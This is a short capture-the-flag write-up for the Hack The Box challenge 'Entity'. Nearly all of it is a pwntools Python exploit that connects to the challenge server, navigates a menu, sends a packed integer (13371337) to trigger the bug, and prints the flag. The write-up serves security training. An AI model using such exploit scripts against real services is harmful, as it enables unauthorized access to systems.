https://app.hackthebox.com/challenges/407

Description

This Spooky Time of the year, what’s better than watching a scary film on the TV? Well, a lot of things, like playing CTFs but you know what’s definitely not better? Something coming out of your TV!

Exploitation

#!/usr/bin/python3
from pwn import *

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

def exploit():
    p = get_process()
    p.sendlineafter(b'>> ', b'T')
    p.sendlineafter(b'>> ', b'S')
    p.sendlineafter(b'>> ', p64(13371337))
    p.sendlineafter(b'>> ', b'C')
    success(f'Flag --> {p.recvline_contains(b"HTB").strip().decode()}')
    p.close()

if __name__ == "__main__":
    exploit()

Summary

Entity: build the exploit primitive, stabilize the payload, and use it to read the flag.